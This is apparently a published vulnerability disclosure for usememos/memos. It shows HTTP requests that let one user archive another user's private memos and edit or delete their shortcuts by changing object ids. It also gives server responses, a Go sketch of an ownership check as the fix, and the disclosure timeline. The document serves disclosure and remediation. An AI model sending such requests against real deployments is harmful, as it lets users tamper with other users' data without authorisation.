Archive any private memos + Delete any Shortcut + Edit any Shortcut from other users in usememos/memos

Valid

Reported on

Dec 23rd 2022


Description

A user can archive any private memo, delete any shortcut, and edit any shortcut belonging to other users via the API:

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}

DELETE /api/shortcut/2

Proof of Concept

Log in to the website in browser 1 as user A.

Log in to the website in browser 2 as user B.

Example: user B has a private memo with id 8.

Using user A's session in browser 1, send the request:

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

The response:

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}

The memo with id 8 is now archived.

Demo video: https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view

Deleting a shortcut works the same way.

Changing the id in the request returns the response true:

DELETE /api/shortcut/2 HTTP/1.1
Host: 127.0.0.1

Editing a shortcut works the same way.

This request edits any shortcut by id:

PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}

The response received is as follows:

{"data":{"id":2,"rowStatus":"NORMAL","creatorId":0,"createdTs":1671875414,"updatedTs":1671875430,"title":"shortahihix","payload":"[]"}}

PoC video for editing and deleting a shortcut: https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view

Impact

Anyone can archive other people's memos.
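
The requests above succeed when the server acts on the id in the URL without comparing the row's creatorId to the session user. The following is an added example, not code from usememos/memos or from its fix: a minimal Go sketch of that ownership gate, which applies equally to the shortcut edit and delete routes. Row, Table, owned, Patch and the user ids (user B = 1, user A = 2) are hypothetical names and constructed values.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

var ErrNoSession = errors.New("no authenticated session")
var ErrNotOwner = errors.New("not found or owned by another user")

// Row and Table are a constructed in-memory stand-in for the memo or shortcut table.
type Row struct {
	CreatorID int
	RowStatus string
}
type Table map[int]*Row

// owned returns the row only to its creator; missing and foreign ids get the same error.
func (t Table) owned(sessionUserID, id int) (*Row, error) {
	if sessionUserID == 0 { // 0 stands for a request without a session
		return nil, ErrNoSession
	}
	if row, ok := t[id]; ok && row.CreatorID == sessionUserID {
		return row, nil
	}
	return nil, ErrNotOwner
}

// Patch applies a body such as {"id":8,"rowStatus":"ARCHIVED"} to the row named in the URL.
func (t Table) Patch(sessionUserID, pathID int, body []byte) (*Row, error) {
	row, err := t.owned(sessionUserID, pathID) // authorize before touching the row
	if err != nil {
		return nil, err
	}
	var patch struct{ RowStatus *string }
	if err := json.Unmarshal(body, &patch); err != nil {
		return nil, err
	}
	if patch.RowStatus != nil {
		row.RowStatus = *patch.RowStatus
	}
	return row, nil
}

func main() {
	memos := Table{8: {CreatorID: 1, RowStatus: "NORMAL"}} // constructed: memo 8 belongs to user B
	fmt.Println(memos.Patch(2, 8, []byte(`{"id":8,"rowStatus":"ARCHIVED"}`)))
}
```

The session user id must come from the server-side session, never from the request body, and the "id" field in the body is ignored in favour of the id in the URL.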

We are processing your report and will contact the usememos/memos team within 24 hours. 5 months ago
Kevin Kien modified the report
5 months ago
We have contacted a member of the usememos/memos team and are waiting to hear back 5 months ago
STEVEN validated this vulnerability 4 months ago
Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
STEVEN marked this as fixed in 0.9.1 with commit 3556ae 4 months ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 4 months ago